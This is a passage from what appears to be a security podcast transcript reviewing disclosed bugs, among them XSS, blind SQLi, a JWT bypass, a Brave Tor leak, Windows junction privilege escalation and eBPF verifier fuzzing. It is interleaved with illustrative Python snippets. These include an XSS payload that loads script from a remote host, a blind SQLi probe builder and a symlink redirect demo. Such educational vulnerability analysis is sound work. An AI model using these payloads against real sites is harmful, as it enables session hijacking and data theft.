be. Yeah, that's the thing. Like, well, it is remote, but it's one of those cases where the circumstances make it so this is almost like a self-attack unless you have control over that repository. So yeah, it's not as serious, but it's still an issue, and the issue was patched in version 2.12.1. Interestingly, there was some collision on this issue as well: Blaze Infosec also found the same issue and did a write-up on it. Apparently they were the first to report it to GitHub through HackerOne, but they weren't the first to find the issue. But anyway, there is that separate write-up for anyone that's interested. I do think this write-up might be a little bit cleaner and easier to follow than the pure-text one that's provided by Legal Hackers. I must say, the second one has a banger of a name: it's called "Attack of the Clones: Git Clients Remote Code Execution", and as a Star Wars fan, I really do appreciate that title. But yeah, so Blaze Infosec collected the bounty from GitHub's HackerOne program, and then Legal Hackers ended up getting the CVE.
And I will just mention, going back on Legal Hackers, that feels like such a bad name. Like, if you have to point out the fact that you are a legal hacker, it just feels like a weird name. I mean, it's completely unrelated, it just seems like that fishy kind of name, you know, "legal hackers", and it also seems like the type of thing you would see in, like, YouTube comment spam: "thank you so much, I found a great hacker at legalhackers.com". I mean, it's completely unrelated to the issue, the legitimate issue. I'm not trying to throw any shade there, I just find the name a little bit
humorous. Yeah, the branding could have been done a little bit better there. So, moving on to YOURLS though. This was an issue with multiple stored cross-site scripting vulnerabilities in the admin panel for YOURLS. Essentially, it seems they provide hooking functionality that allows you to replace code with code you control; they call it a filter. So if I just scroll down here to the code: yourls_add_filter on shunt_is_valid_user, and then you can replace that with an exploit payload, and the researcher states you can use that to perform XSS. This issue is... I mean, okay, so you need to have administrative access, to be able to edit PHP code, to be able to exploit this issue. I'm trying to see where this would actually be useful to attack somebody with. Yes, I suppose the scenario here is a rogue
admin. That's basically the only case. I mean, usually with cross-site scripting you're going to want kind of a privilege escalation of sorts: you find a page that you can get XSS on that somebody with more privileges can access or be infected by. In this case it's an admin user, so you already have all the permissions; you have permission to add code. So, I guess, to be fair, I will mention here that part of the cross-site scripting does come from the comments at the top here: the plugin name, plugin URL, description, version, author. All of those are where the cross-site scripting actually comes in; those get parsed and then displayed when you list all of your plugins. So it has to be an admin installing a malicious plugin. So you could write a plugin that would seem legitimate that also did the cross-site scripting; it would potentially be other people installing it, too, like there is that avenue of attack. Like, I don't think the plugin name should be vulnerable here at all. But they're just showing it's possible for the plugins to be abused, and this cross-site scripting does come out with, like, the name and stuff. It's not like the payload here is just "you can cause code to run". So this is if you want to have a backdoored plugin, which is kind of a given if you're going to have a plugin at all: they can be backdoored.
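As a rough illustration of how plugin-header metadata can carry stored XSS, and how escaping at display time stops it. This toy parser is only loosely modeled on the YOURLS plugin header format, not its real code:

```python
import html
import re

def parse_plugin_header(source):
    """Toy parser pulling 'Plugin Name:'-style fields out of a plugin's
    header comment (an assumption for illustration, not YOURLS's code)."""
    fields = {}
    for key in ("Plugin Name", "Description", "Author"):
        m = re.search(rf"^{key}:\s*(.+)$", source, re.MULTILINE)
        if m:
            fields[key] = m.group(1).strip()
    return fields

def render_plugin_row(fields):
    # Escaping the metadata before display is what stops the stored XSS,
    # even when the plugin author is untrusted.
    return "".join(f"<td>{html.escape(v)}</td>" for v in fields.values())

header = """/*
Plugin Name: Totally Legit <script>alert(1)</script>
Description: does useful things
Author: someone
*/"""
print(render_plugin_row(parse_plugin_header(header)))
```

With escaping, the script tag in the plugin name renders as inert text in the admin's plugin list instead of executing.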
Yeah, you don't want to be installing untrusted plugins. Typically not a good.
I mean, people generally do, but yeah, you generally don't want to. But most people aren't going to do a code audit of every plugin they plan to install, unfortunately.
So I'm not saying that this isn't an issue; I think it is an issue. I do take a little bit of issue with the severity, though. I looked at the CVE because I was curious, because they have the severity on their report listed as, I think they have it as severe, right? I'm trying to find where they have that. But anyway, in the CVE, the CVSS score has the privileges required as low. I don't fully agree with that assessment: you do need admin capability, and that is pretty much the maximum level of privileges you can have. Like you were saying, this is more of a backdoor attack, it's not a privilege escalation. So, well, the thing is, it has a little bit of a weird rating for me, that they put it to medium.
Yeah, people generally don't, and most people aren't writing their own plugins. This is going to be, like, a plugin written by a remote attacker, which they then install. So while the attack does need the admin to actually do the installation, the plugin... in most cases people aren't the author of their own plugin; they're probably not writing it and intending to have a backdoor in their application. That's where I kind of draw the line there, as being, like, okay, I could understand where you're saying it's an unauthenticated attacker, because the code's probably being written by somebody completely removed from the actual process, like from the administrative privileges.
Yeah, I can kind of see that. Although at the same time, if that's happening, they can run PHP code, which is already more of an issue than what this attack is. Oh, yeah,
for sure. Like this is a case of like just installing malicious code.
Yeah. So like I
it's just a case of trusting what you're running or not trusting what you're
running. Yeah, but this is another issue where, yes, it's an issue and it should be fixed, and it seems like it was fixed, since they list a max version for what the bug can hit, but pretty, pretty low impact, at least in my opinion. So we'll get into a fun story. This was a fun story from a British software engineer that decided to start a company and file the name as an XSS vector: the name was a quote, a closing bracket, and then a script tag sourcing MJT dot XSS dot HT, basically making his company name an XSS vector. And this is further than I think I've ever seen anyone go when it comes to trying to exploit an XSS, although they do mention there were some previous attempts that just never really got public attention. There was apparently an SQL injection one as well that was based on that XKCD comic, I think it was little Bobby Tables... yeah, that's what it
was. There has been... I mean, the SQL injection ones I always find a little bit less... well, they are significantly less likely to work, just because you need to know the proper table name to actually try and drop, and you need to have a case where it's splitting on the semicolons and can run stacked queries, which is just not terribly likely in many cases. Whereas the cross-site scripting obviously did work and can
work. If more practical yeah,
yeah. Well, you need to know a lot less; you just kind of hope it's being injected. Like, if you get that double quote in there, it's basically going to work, and if you don't, it's not going to work. Like, there could be more complicated scenarios, but for the most part it's a lot easier to get a hit. Yeah,
so like you said, this can and did work, and it actually caused so many issues that they forced him to change the company name. The company name had to change to "that company whose name used to contain HTML script tags LTD". So yeah, they said a company was registered using characters that could have presented a security risk to a small number of customers, and that's why they made him change the name. So, kind of a funny story. Just another one of those cases where it's something you probably don't really think of; you don't really think of a company name being a potentially malicious attack vector, but as this person showed, it is one. And while it is pretty far to go to exploit an issue, it is a potential route to go. So, yeah, I guess he just wanted to do it as kind of drawing a red flag to that, saying companies should be considering this in their threat model, I guess.
Yeah, I mean, it's a long route to go. It is also, even with cross-site scripting, what could they have done on this page? You know, installing malware is about the only value they'd get out of it. I'm not sure there's necessarily an admin area or something that they would have been able to use, like there is definitely a bit of a limited risk there. Although, you saying using this to install malware, you know, would be completely fair, like it is an issue
still. It could be hard to do, though, because I could see there being limits on the payload, right? I don't know all the restrictions on company name filings especially. Well, but
the thing is, like, in this case they just use a remote source, so they can put any code they want in that MJT dot XSS dot HT. Yeah, well, your code goes there. This is the complete cross-site scripting you need for arbitrary
injection. Yeah, so malware drive-bys are still a very real type of attack that could be done using this.
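The attribute-breakout mechanics of a name like that can be sketched as follows; the payload shown is reconstructed from the episode's description and may not match the actual filing exactly:

```python
import html

# The registered name (as described above) doubled as an XSS payload: a
# short attribute breakout that pulls the real code from a remote script.
company_name = '"><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT>'

# Any consumer interpolating registry data straight into an attribute...
unsafe = f'<input value="{company_name}">'
assert "<SCRIPT" in unsafe  # the breakout survives; remote JS would load

# ...versus escaping it first (quote=True also encodes the double quote,
# so the attacker can never close the attribute):
safe = f'<input value="{html.escape(company_name, quote=True)}">'
print(safe)
```

This is also why the payload can be so short: the name only needs to break out and point at a remote source, and the remote script carries the actual attack code.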
Yeah, to be fair, that's kind of covered by the last one,
too. Yeah, continuing on our XSS train, we have a Facebook DOM-based XSS using postMessage. So I'll let you take this one over, zi, because we do love Facebook here. But this issue was a little bit confusing to me, so I think you might be able to help clarify some of the weirdness of this
post. But this one definitely went a little bit of a roundabout way from the first issue that they found. So there are two bugs that got chained to get cross-site scripting. The first bug just allowed an attacker to send a postMessage from a facebook.com domain or subdomain; I think they originally found the issue targeting an internal facebook.com domain. But anyway, Facebook had this payments redirect page, like facebook.com/payments/redirect.php, and what they found was, if you changed the type parameter from "i" to "rp" (they might have brute-forced that, they don't actually say how they found it), it would create a postMessage to send a message to window.opener. postMessage, if you're not familiar, is just a way of sending messages between windows, even across origins.
So I think, out of all the cross-site scripting issues we've covered lately, this one was probably the most difficult for me to wrap my head around, probably because I'm not really familiar with that postMessage API that you were talking about earlier. But yeah, I mean, this is an issue that's hitting Facebook, and Facebook was quick to turn around on this: I think the issue was reported on October 10th, and it was fixed October 28th, and they paid a $20,000 bounty. So Facebook's been known to pay pretty well for issues. So if you're looking for somewhere to look, Facebook might be an idea. But yeah, this issue was tough for me to wrap my head around, so thank you for explaining it there, because you cleared up some of the points that I was confused on.
Yeah, it's definitely a little bit roundabout, because it does have that extra layer of the attack where they have the two bugs being chained: the one bug giving you the postMessage, and then finding somewhere that trusts that postMessage, which definitely adds to the complexity. We have covered, I don't know if it was exactly the same as this, but we have covered another attack that abused postMessage. That was a Google one, like it did this domain check to make sure it was only... sorry, I was just looking it up here. So this is on episode 33, the unexpected Google domain bypass, where Google would generate API keys: when you're using the API documentation, you can click a button to open an iframe, and it would communicate the API key back over postMessage, so they were able to bypass one of the checks there. So, just another issue kind of taking advantage of postMessage, because there is kind of that trust, and if you're able to violate that trust there are usually further issues. So just wanted to call that one out as well. That episode 33 one was also a little bit complicated to get through, but it's definitely worth giving it a read.
Your memory is way too good, I'm jealous. I totally forgot about that issue, so good on you that you were able to remember that.
it's artificial memory. I have it written down
Okay, fair enough. So, getting into our last SQL injection and XSS of the episode, we have a reflected XSS and SQL injection in the Oracle Communications Diameter Signaling Router (DSR). So the reflected XSS seems to be present in the grid filter column parameter for one of the pages and the grid filter value parameter for Range Based Address Resolution. This can be reached by anyone on the network, which is notable: it doesn't require authentication or anything like that, and it can allow an attacker to hijack a session in order to exploit the more impactful bug, which is the SQL injection. This was in the admin panel endpoint for listing systems via the Simple Network Management Protocol, and it was a Boolean-based blind SQLi through the scope parameter. In terms of timeline, it was reported February 14th, and then all the way through the year to October 20th, when the critical patch update was issued. So this is the longest turnaround time we've had in the episode, and maybe in the last couple of episodes; that's quite a while to fix the issue, but it did eventually get fixed. But yeah, it seems like they were decently straightforward issues. Unlike the last one, there was no super roundabout way to reach these ones. It was just straight-up parameters that were exposed in the URL, that were passed along, and they just didn't sanitize them. So
yeah, I mean, the blind ones are always a little bit tricky to find and exploit, just because, well, it's blind: you don't have anything too obvious telling you that you're actually getting a successful hit. In some cases, like in this case, it looks like it was pretty straightforward: a single quote and a single bracket to escape, then inject their arbitrary query, so you could figure it out from there. But sometimes it can be kind of tricky; in this case it doesn't look like it was that bad. Worth pointing out, like, it's a good find, especially if this wasn't a white-box
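A boolean-based blind probe of the kind described can be sketched like this; the parameter values are hypothetical, not the report's actual injection string:

```python
def boolean_probe(base_value, condition):
    """Build a boolean-based blind SQLi probe for a single-quoted value
    (hypothetical values -- not the report's exact injection string)."""
    # Break out of the quoted value, AND in a condition we control,
    # then re-balance the quotes so the query still parses:
    return f"{base_value}' AND ({condition}) AND '1'='1"

true_probe = boolean_probe("dsr", "1=1")
false_probe = boolean_probe("dsr", "1=2")
print(true_probe)   # dsr' AND (1=1) AND '1'='1
print(false_probe)  # dsr' AND (1=2) AND '1'='1
# If the response differs between the two probes, the injection is
# confirmed; conditions testing one character at a time can then
# extract data despite the query results never being shown.
```

That response-difference oracle is exactly why it's "blind": you never see query output directly, only whether the page behaved as the true case or the false case.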
assessment. Yeah, now, I will say, NCC Group, we've covered them a lot and they always give really detailed timelines. It is pretty interesting to go through the timeline: you can see all the way through the year, until they patched the issue, there were a lot of automatic status updates, "under investigation" and then "issue addressed in the main codeline". Like, it's funny how much detail they provide here, when really it's just Oracle saying "don't worry, we know, we're fixing it". There are a lot of redundant details in the timeline, but, you know, fair enough; NCC Group has always been more verbose when it comes to reporting the timeline, which definitely isn't a bad thing, it just gave me a bit of a chuckle when I was looking at it. Yeah, the issue itself is fairly straightforward, not too much to talk about there. Our next post is rediscovering a JWT authentication bypass in ServiceStack. So this is a PSA-type post from a pen-testing company called Shielder, and it talks about how they ended up discovering a previously reported and fixed JWT authentication bypass in ServiceStack on an assessment. So unlike most of the exploits that we cover, this one was already patched. Essentially, they tried to bypass a third-party auth service the web app was using, which utilized JWT tokens, and they discovered that when you remove the signature from the token, they got a 200 OK response back instead of an error response, which is really strange and basically tipped them off that there was a big problem here.
Actually, I won't say it's that strange. This one is basically your no-signature issue. It should be less common than it is, you'd wish it was, but it's definitely not that unheard of. Probably one of the most common things that I see if I assess something dealing with JWTs is just not caring about whether or not it's signed, and of course, if it's not signed, you can modify it and do whatever the heck you want with
it. Yeah, and the reasoning for it, like you said: there was no length check on the signature comparison, it just did a straight-up compare. So when you're comparing zero bytes, it's always going to succeed, and we've seen this exact type of issue before. I can't remember exactly what we were covering, but this seems to be a really common code pattern, which is really silly, but it's just one of those things that people seem to overlook. So, how they ended up discovering the details and root-causing the issue was, after some recon, they discovered the app was using the ServiceStack library, which is, you know, open source, so they were able to look into the source code and find the issue. Now, like I was saying earlier, this issue was already fixed by ServiceStack in August, and they found that this was weird, because the customer they were assessing seemed to be very vigilant when it came to third-party libraries and keeping them patched. And yeah, they said no other dependency had known vulnerabilities, and it seemed they paid attention to security advisories. The problem here seemed to be that there was no advisory or impact given for this issue; it was just kind of silently fixed by ServiceStack. So that was the reason they put out this blog post, even though the issue was already fixed; it wasn't like a zero-day they discovered or anything. They wanted to get an advisory created and a CVE assigned, that way others also have that advisory to go off of, so that more companies don't end up getting burned by this, basically, which I think was a cool move on their part. They didn't have to do that. Obviously it is good PR, but still, they weren't obligated to do that, so I think that's good on this pen-testing company. But yeah, really unfortunate that these silly no-length-check issues are as prevalent as they are.
If you're comparing something make sure to actually check that there's something to compare against or else you're going to open yourself up to issues.
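The comparison bug being described can be sketched in Python; this is a simplified HS256 check for illustration, not ServiceStack's actual code:

```python
import base64
import hashlib
import hmac

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def verify_hs256(token: str, key: bytes, strict: bool) -> bool:
    """Simplified HS256 verification (an illustration, not ServiceStack's
    code) showing why the missing length check matters."""
    header, payload, signature = token.split(".")
    expected = b64url(hmac.new(key, f"{header}.{payload}".encode(),
                               hashlib.sha256).digest())
    if strict:
        # The fix: reject outright when the lengths don't even match,
        # then compare in constant time.
        if len(signature) != len(expected):
            return False
        return hmac.compare_digest(expected, signature)
    # Buggy pattern: a compare bounded by the attacker-supplied length,
    # so a zero-length signature "matches" anything.
    return expected[:len(signature)] == signature
```

Stripping the signature off a forged token then sails straight through the non-strict path, which is exactly the 200 OK the testers saw.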
Yeah, so, I mean, I do want to call out here that ServiceStack definitely downplayed this issue. I just pulled up the release notes, and I'm trying to find exactly where they were talking about it... yeah: "if you're using JWT auth, please upgrade to v5.9.2 when possible to resolve a JWT signature verification issue". That's the only warning they gave about this, and I would argue this sort of issue does kind of warrant a more significant warning when it's literally a complete authentication bypass.
Yeah, I'd agree that that's definitely downplaying and I just happen to be
well, this was why their client hadn't updated: because the patch notes didn't really indicate that it was a huge issue. So I do just want to call that out for ServiceStack. Like, you should be clear about your vulnerabilities.
Yeah, especially when you're being used as a third-party library and things, right? That's part of your, I guess, duty to people who are using your stuff. So yeah, okay, I think that's fair to call them out on. Up next is a vulnerability in the Brave browser's Tor implementation. Now, I didn't know this, but apparently in 2018 Brave integrated Tor sessions into the browser, which is kind of cool, and I'm surprised I'd never heard about that, but I've just never really been somebody that's ingrained into Brave or anything like that. But the issue comes down to the fact that Brave has a referral rewards program. They commonly use this for crypto-sponsored backgrounds and referral links to crypto trading websites; among some of their partners, I think, are Coinbase, Softonic, and MarketWatch, those were some of the examples they listed as part of that program. So you can see in the code snippet they provide, there's an x-brave-partner header in the referral request, and this header is sent even if you're browsing with Tor, by the way. On top of that, there's also a local data store for this referral program which includes sensitive information about Tor browsing sessions, and this data doesn't get wiped after the session is terminated. Some of the data included in that local store is the referral attempt count, a timestamp, and whether or not Tor was used. So, pretty compromising information if someone can get ahold of that private data store. Now, that issue was fixed; I believe the local store is actually cleared now, although, yeah, it wasn't
clear if they still send that
header or not. I was trying to see if they also don't send that anymore, but I don't believe they talk about that. So
it seems like that header shouldn't have been sent in incognito mode at all, so I don't believe they'd still be sending it. I'm not sure if they specifically call that out, but that seemed to be the gist you got when looking at the messages they had back and forth. As for the information that actually gets leaked, it does require kind of local access to be able to pull that folder. When it's sent out to Brave, it's bucketed into, like, did they use it in the last 24 hours, or last week, or 28 days, or ever; it's just kind of bucketed like that, so it doesn't give a lot of information. But as they do point out, if you were, say, a civil rights activist using Tor for something and got raided by the police, you know, they'd have access to that timestamp, and they could correlate that with timestamps from your ISP to know that, okay, you were using Tor at exactly this time, like to the millisecond. So, definitely some issues with that, but it does require that local access for that particular part of the leak. Obviously the header isn't that same issue, like these are multiple issues here, but for that one it did require local
access. Yeah, even though it requires a high degree of access, it is basically within Tor's threat model. So
oh, for sure. Yeah, and they mention that that wasn't something they intended to do. What they had ended up doing was logging every incognito usage, which includes Tor, but they only wanted the non-Tor ones. So what they ended up doing was only logging for non-Tor, and they ended up deleting things afterwards,
too. Yeah, so the authors do give credit to Brave for being clear with communication and being open about the issues, as well as having a quick turnaround, so that's cool to see; it was fixed within a few days. I will say, I don't know how I feel about that referral rewards program in Brave, because it sounds like it's not opt-in, it sounds like it's opt-out: as soon as you install Brave and use it, this is already happening in the background. Which, I mean, I don't know how I feel about that; I feel like that is kind of, I don't know, stealthy, I guess. I don't know what your thoughts are on that, zi. Like, do you think it's fair that they do
that? I was thinking about it a little bit. It is a small set of specific Brave partner websites that it's basically announcing, hey, this person uses Brave, to. It does feel a little bit antithetical to Brave themselves, like they're kind of anti-tracking. So it does feel a little weird. It is a way that they're making some money, and it is just a limited number of sites. Although I do see Softonic on there, and I'm not a fan of Softonic.
I feel like I haven't even heard of Softonic in years.
Yeah, because everybody's been saying the same thing. Like actually, I'm just opening it up in another window to make sure it's the website I'm thinking of. I think it is. It's been so long, but they just have such a bad reputation.
Yeah. I've seen some software that uses it and I'm like, oh no, is there a mirror that I can use somewhere else?
pretty much. Um, I would say that this does feel a little bit shady from Brave. I can kind of understand it. It's definitely a limited impact, it's announcing you're using Brave to a small set of websites, but it still feels pretty shady, especially since the only reason to do that is effectively for tracking purposes. Like, I can't imagine any other reason why they would want that; I can't come up with a charitable explanation. Maybe Brave will put out a statement about it. But I don't know, it does feel off. Actually, looking at this picture here, there are quite a few domains.
That I don't recognize. Like, the Coinbase stuff were just the headlining ones; it seems like there was a more extensive list. So yeah, I found that to be a little bit shady, but we'll give them credit where credit is due: at least they did fix this issue, and they were quick to address it. So yeah, it was fixed within a few days. I think the author even said if it wasn't reported before the weekend, they think it probably would have been fixed the same day. So that's cool.
Yeah, I mean, it was a good response. I have mixed feelings about Brave in general. I do use Brave; it's my mobile browser.
So Brave, they introduced that token system.
Yes, the attention token. Oh yeah, that's where they took a lot of heat, because Tom Scott didn't seem to understand that his picture was the favicon for his website. So he made a big deal about them creating this spoofing page asking for donations and using his picture, when it was just using the favicon of his website as the picture. They took a lot of heat over that, and Brave definitely did some things wrong with that too, I'm not shifting all the blame, but it really blew up just because one celebrity got worked up
over it. Yeah. That said, I think we can move on to a post from IOActive which talks about a privilege escalation on Windows through the Microsoft Store. So this focuses on the ability to facilitate moddable games. For those who haven't played video games that support modding: some PC games allow you to use mod tools or what have you to add custom functionality to a game, adding to its extensibility. An example that probably almost everyone has heard of is Minecraft, right? There's a Minecraft plug-in system, for example. Now, because Windows Store apps are usually put into read-only, restricted directories, moddable games need an exception to allow the installation files to be modified for installing mods. To do that, they create a directory specifically for that purpose called ModifiableWindowsApps. Now, because of that powerful capability, Microsoft does limit the ability to have your game be a moddable game to a whitelisted set of games that are pre-approved by Microsoft. So the researchers at IOActive chose to target a game that supported this capability, going with one called Faster Than Light, which is a space strategy game. They initially attempted to use junctions in the installer directory to be able to install games to an arbitrary directory. That initially didn't work, though, because users don't have the permission to replace the ModifiableWindowsApps directory, and access to its contents is restricted. They discovered, though, that Windows provides a feature that allows you to specify where new apps and documents are saved to by default, through the control panel, presumably so that people can install games and stuff to a different drive other than the C drive, which makes sense from a convenience point of view.
Yeah, and this is the same thing that you use for your libraries. So like, when you click documents or videos, you can point that to any folder. When it comes to this, it's just asking for your drive in this case, but it's the same feature: you can tell it where it should store certain things.
Yeah, the problem was, they found that when they changed to a different drive other than the C drive, those permissions were much less restricted for some reason, and users managed to gain access to the ModifiableWindowsApps directory. So then they could go back to that original attack they tried to pull off, which was turning the game directory into a junction to make the installer operate on an arbitrary directory. So initially they used that to basically facilitate an arbitrary directory wipe primitive: they would cause the installation to fail, which would cause the game files to get wiped, and they used the junctions so that when the game data is deleted, it wipes the directory the junctions point to. They then used the installation feature with the same trick to get arbitrary file write, and that's how the escalation of privilege comes into play. At the bottom of the post they have a PoC for how they did that; I think they have a little GIF showing what they did. I thought this was an interesting vector. I haven't really heard of the Microsoft Store being targeted in this way before, so I think that was kind of interesting, and where this blog post brings some unique insights to the table. At the same time, though, this is yet another junction or symlink based attack, it seems.
These are just never going away. This one differs a little bit, though, because this isn't the RPC control vector from James Forshaw; this is actually just making a directory junction. And as out of chat my friend mentions, junctions can be created without high privs. My understanding was that no, you couldn't do these junctions without having the privileges for it, that that RPC control was kind of the trick to get away with it, but it looks like IOActive here is just straight up using the junctions. Now, I might be mistaken here. Like I said, they're definitely presenting this as though creating the junction is something you can do from just a standard user account. That's definitely the presentation of the article, so I'm kind of going to roll with that, but I do have the same question my friend did. I thought that this was something that did require higher privileges, and it's something I'll have to look into a little bit further. Do you know offhand, Specter?
No, I don't. I will quickly pull up a chat message, though; somebody asked what a junction is, for those listening who aren't familiar with Windows terminology, because Microsoft does just like to rename things for no reason. A junction is basically a symlink, it's the Windows equivalent of the symlink. They are a little bit different, and I think there are different types of junctions, it gets really unnecessarily convoluted, as is Microsoft's way, but for all intents and purposes it is basically a symlink. So for those familiar with Linux and not with Windows, that might help you understand the issue a little bit more here. But yeah, this is just another example of how symlinks and junctions can be leveraged to do some damage.
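For listeners on Linux, the redirect idea behind these link-based attacks can be sketched with a plain symlink standing in for the Windows junction. This is only a rough analogue (the paths and filenames are made up, and real junctions point at directories with different semantics), but it shows the core trick: a more-privileged process that writes through a path the attacker controls ends up writing wherever the attacker's link points.

```python
import os
import tempfile

workdir = tempfile.mkdtemp()
attacker_dir = os.path.join(workdir, "game_dir")      # path the "installer" trusts
target_dir = os.path.join(workdir, "sensitive_dir")   # where the write really lands
os.mkdir(target_dir)

# The attacker replaces their directory with a link to the target.
os.symlink(target_dir, attacker_dir)

# A naive privileged installer writes "into the game directory"...
with open(os.path.join(attacker_dir, "installed.dll"), "w") as f:
    f.write("payload")

# ...but because the path is a link, the file lands in the sensitive directory.
print(os.path.exists(os.path.join(target_dir, "installed.dll")))  # True
```

The arbitrary-delete variant works the same way: if the installer cleans up "its" directory by path, the deletions follow the link into the victim directory.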
Yeah, and with that being used in this context, I really liked the double junction for getting the delete to happen, using a pivot junction so that it will see the sensitive folder kind of like underneath something that you control, or something that you point it to. I did like that sort of double junction attack. I haven't really seen that before; it kind of makes intuitive sense when you think about how the attack's working and everything. But yeah, like I said, I do have the questions about the privileges, but that was kind of a different perspective, a very different take on it, I
guess. Yeah, I think that double junction trick is one of those things where it's not necessarily new, but it was new to me, and I'm guessing new to you as well based on the way you're speaking of it. So yeah, some interesting insights out of this post,
although one thing, and maybe I just didn't read it closely enough, but they managed to spawn an NT AUTHORITY\SYSTEM shell using this. But they only talk about basically just replacing files, like deleting files and having it write somewhere else, and they end off with the elevation of privilege section without really talking about how they weaponized this.
Yeah, I'm guessing it was a DLL hijack, but yeah, it would have been nice to have
that. It kind of comes down to, I guess they don't explain exactly how it gets the files that get put over, like what control you have over what it writes. I can see, I guess, if you could just include a new installation file, like a DLL, pointed to write into like System32 or something, then yeah, you could easily elevate. I just feel like they probably could have included a few details to make that a bit more clear. That does seem like it should be the obvious attack vector, especially since you mentioned doing a DLL hijack, Specter, like that's pretty obvious. It just feels like they should probably have included some details on that.
Yeah, I feel like that is the most likely strategy, the one you laid out there. And if that was their strategy, I could see why they might not want to include it in the post; they might see it as something that is obvious, or at least obvious to them, so they just didn't want to add what they would see as filler. That said, I agree, I think they probably should have included at least a sentence or two just mentioning how they bridged that gap. But yeah, it seems most likely it's a DLL hijack. Revisiting a favorite set of topics, kernel and fuzzing: we have a topic that touches on fuzzing the extended Berkeley Packet Filter in the Linux kernel. So the bug in this blog post, it initially talks about CVE-2020-8835, which was an out-of-bounds access in the BPF verifier. We actually talked about this bug in episode 38 of the podcast, which you can check out if you're interested in hearing about how that bug works; all of our podcasts have timestamps, so you can just check out that bug on YouTube and go to that section if you want to. Essentially, the commit that tried to address that bug ended up introducing a new one, and it was discovered by fuzzing. So while that bug will be interesting to look at, first the author goes into methodology around the architecture of the fuzzer they wrote, as well as some custom bug detection. Just before you
go into that, I do want to talk a little bit about BPF, out of chat, you know, how does this relate to JIT? If you're not familiar with Berkeley Packet Filter programs: you're able to write small, very constrained programs that will be compiled and executed in the kernel. It has its own set of instructions, and there are constraints on those instructions and what they can do, to make sure the program is going to terminate, things like that. But effectively it's a little program that gets just-in-time compiled and executed in the kernel to run against network packets coming in. So that's where the JIT aspect comes in. It is a little bit weird to have a JIT in the kernel, and BPF has definitely been an area where there have been vulnerabilities before.
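To make the "small constrained programs run against packets" idea concrete, here's a toy filter interpreter in that spirit. The opcodes and encoding are made up for illustration, this is not the real cBPF or eBPF instruction set, but the shape is the same: an accumulator, a tiny instruction list, and an accept/drop verdict per packet.

```python
# Toy filter VM in the spirit of classic BPF (opcodes are invented for
# illustration). Each instruction is (op, arg); the program runs against
# a packet's bytes and returns 1 (accept) or 0 (drop).
def run_filter(program, packet):
    acc = 0
    pc = 0
    while pc < len(program):
        op, arg = program[pc]
        if op == "LD_BYTE":      # load packet[arg] into the accumulator
            acc = packet[arg] if arg < len(packet) else 0
        elif op == "JEQ":        # skip the next instruction unless acc == arg
            if acc != arg:
                pc += 1
        elif op == "RET":        # 1 = accept the packet, 0 = drop it
            return arg
        pc += 1
    return 0

# "Accept the packet only if byte 9 (the IPv4 protocol field) is 6, i.e. TCP."
prog = [("LD_BYTE", 9), ("JEQ", 6), ("RET", 1), ("RET", 0)]
tcp_packet = bytes(9 * [0]) + bytes([6])
udp_packet = bytes(9 * [0]) + bytes([17])
print(run_filter(prog, tcp_packet), run_filter(prog, udp_packet))  # 1 0
```

The real kernel adds the parts this sketch skips, a verifier that proves termination and memory safety up front, and a JIT that turns the bytecode into native code, and that verifier is exactly where the bugs discussed here live.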
Yeah. It's basically a VM in the kernel which is not a great idea.
Yeah. Well, that's a better way to describe it than what I
did. Yeah. It's why in some operating systems, like FreeBSD, BPF is restricted to root; for whatever reason, in Linux it's not. The ability to run custom instructions in a kernel parser just opens up so many potential bugs, because you're dealing with pointer arithmetic, and that gets really tricky to manage when you allow untrusted people to specify what kind of arithmetic you're doing there. And like you said, there's been, I want to say, around 10 bugs in BPF if I want to be generous; I don't have an exact count, but there's been a lot of issues that have spawned out of BPF. But yeah, like I was saying, they get into the fuzzer first. Along with some of the background, they include some background on the difficulties involved with fuzzing BPF specifically, and why they didn't use existing kernel fuzzers like syzkaller. The two points they mention are that kernel fuzzing can be slow when you're dealing with syscalls and context switches, and the second point is that the BPF verifier is protected by a mutex, which makes fuzzing on multiple cores difficult, because you end up waiting on that mutex or deadlocking with it, and they cite that that would scale badly with cores. So the strategy they went with was basically calling kernel functions in userspace programs, which is not super new; we've talked about a strategy like this before, taking kernel drivers, executing them in userspace, and then hooking the kernel API functions, like kmalloc for example, and just substituting it with a userland malloc. In terms of the architecture of how the fuzzer works, it's actually very similar to syzkaller: it has a manager, and worker VMs that work under it and report back up to it. What I thought was unique and interesting, though, was the bug detection part, because they cited the fact that if corruption didn't trigger a crash,
it probably wouldn't get detected. And basically what they did here was a bit of a taint check: they wrote a random value into a mapping where a write should have occurred, and then checked if the BPF filter overwrote that value, and used that as an oracle to determine whether the pointer arithmetic checked out. If that value is overwritten, the pointer arithmetic was fine; if it wasn't overwritten, then there was corruption there. So from there, they basically did generation-based fuzzing with templates. Getting into the bug, which is CVE-2020-27194: the bug I mentioned earlier that was fixed earlier this year was essentially an issue of falsely deriving a 32-bit value from a 64-bit register when performing range tracking. I'm not going to go too much into the details of that bug because, like I said, we did cover it before, but how they attempted to fix the issue was they extended the range tracking by pulling out the 32-bit variants into their own functions and fields in the verifier structure, to handle them separately. So before, they tried to handle both 64-bit and 32-bit values in the same paths; now they separate that out. The way they did that was they wrote new functions to handle the 32-bit variants, and it seems they basically just copy and pasted the original ones and changed the relevant pieces for 32-bit. Problem is, one of the functions broke that pattern, and the 32-bit variant actually wrote the 64-bit values into 32-bit fields, which, you can see why that would be an issue when it comes to overflows and truncations and whatnot. And this was the scalar32_min_max_or function. So yeah, like I said, it seems they just copy and pasted the original functions, and this bug was the result of a copy-paste error; they just forgot to change the width of those fields in that function. The fix for this was very straightforward: they just fixed it
so the function uses 32-bit values instead of 64-bit values. I liked this blog post, and I thought the bug was pretty funny. It's always fun to see those copy-paste derived errors. You'd think after the first bug they'd go through and try to test for these kinds of issues, because those copy-paste errors are so easy to make, but obviously they didn't.
It's just so easy for somebody to overlook.
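A rough sketch of how that kind of 64-bit-into-32-bit mix-up goes wrong. This is only a model of the failure mode, not the verifier's actual code: the function and field names are illustrative, and the masking below stands in for C's silent truncation when a 64-bit bound is assigned into a u32 struct field.

```python
U32_MASK = 0xFFFFFFFF

# Model of the copy-paste mistake: the 32-bit helper feeds a 64-bit bound
# into a u32 field; the "& U32_MASK" models C truncating on that assignment.
def tracked_u32_max_buggy(dst_u32_max, src_umax64):
    return (dst_u32_max | src_umax64) & U32_MASK

# Source register: a 64-bit bound of 0x1_0000_0000 means its LOW 32 bits
# can be anything from 0 to 0xFFFFFFFF at runtime.
src_umax64 = 0x1_0000_0000
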